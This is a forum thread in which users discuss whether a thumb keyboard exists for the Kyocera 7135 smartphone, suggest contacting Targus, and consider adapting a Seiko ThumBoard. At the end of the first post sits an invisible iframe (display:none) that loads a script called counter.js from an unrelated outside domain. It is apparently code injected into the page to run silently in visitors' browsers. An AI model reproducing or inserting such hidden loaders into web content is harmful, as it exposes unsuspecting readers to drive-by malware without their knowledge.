+ Reply to Thread

thumb keyboard for 7135

Having searched the previous posts on keyboards, I could not find out whether Kyocera plans to introduce its own thumb keyboard (like the one that you can get to attach to a Palm Pilot) or if another manufacturer plans to.

It seems to me that Treo and TW have an advantage over Kyo in that you can use either the built in keyboard or graffiti using provided software. I could see a thumboard being distinctively useful (vs. a fold out keyboard) given its compactness and portability. However, the only available keyboard appears to be the fold out version that is bulkier and appears to require a flat surface to use vs. walking around.

If anyone has any insights on this, please respond.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Re: thumb keyboard for 7135

Originally posted by msneider
    Having searched the previous posts on keyboards, I could not find out whether Kyocera plans to introduce its own thumb keyboard (like the one that you can get to attach to a Palm Pilot) or if another manufacturer plans to.

It seems to me that Treo and TW have an advantage over Kyo in that you can use either the built in keyboard or graffiti using provided software. I could see a thumboard being distinctively useful (vs. a fold out keyboard) given its compactness and portability. However, the only available keyboard appears to be the fold out version that is bulkier and appears to require a flat surface to use vs. walking around.

If anyone has any insights on this, please respond.
    I'm not aware of any plans for a thumb board for the 7135. Would be nice though!
    Dave

Targus makes great thumbpads for a number of PDAs (I had one for my Vx)
    http://www.targus.com/accessories_pda.asp

I would love to have one for the 7135.

How about writing Targus and letting them know you want one. I have!

Targus
    General Information
    1-877-482-7487 (phone)
    info@targus.com

Press Information
    1-714-765-5555(phone)
    publicrelations@targus.com

Product Information
    1-877-482-7487 (phone)
    sales@targus.com

Good! Now everyone should email Targus and tell them to produce a thumbpad for the 7135!

Originally posted by msneider
    As for Targus, I can't blame them for not introducing a product yet as it would seem necessary to first have a major wireless carrier actually release the phone first.

Mark
    to quote a former presidential candidate (Pat Paulson) "Picky, picky, picky" Just kidding - as he was during his candidacy(s?)

Gathering data for use when it is released sounds like a good idea though. But keep an eye on Markito - he will vote like they do in Chicago - early and often - LOL

Re: Thumb Keyboard for 7135

Originally posted by MTdude
    Has anyone seen a thumb keyboard for the Kyocera 7135?
    I have not seen one, nor have I read of anyone here having seen one. I haven't even heard of anyone claiming to have heard about someone else having seen one.

I don't think there is one... sorry
    Please visit my picture site: Robert-O-Rama :)

I had a RIM Blackberry and saw a "dongle" that allowed the RIM to use a Palm keyboard.

Perhaps some electronic genius out there could take a cable from the Kyocera 7135 foldable keyboard and modify it to fit the Seiko ThumBoard.

Here is a review of the ThumBoard. http://www.visorcentral.com/content/Stories/1335-1.htm.

Come on people, let's get creative!!
    MT Dude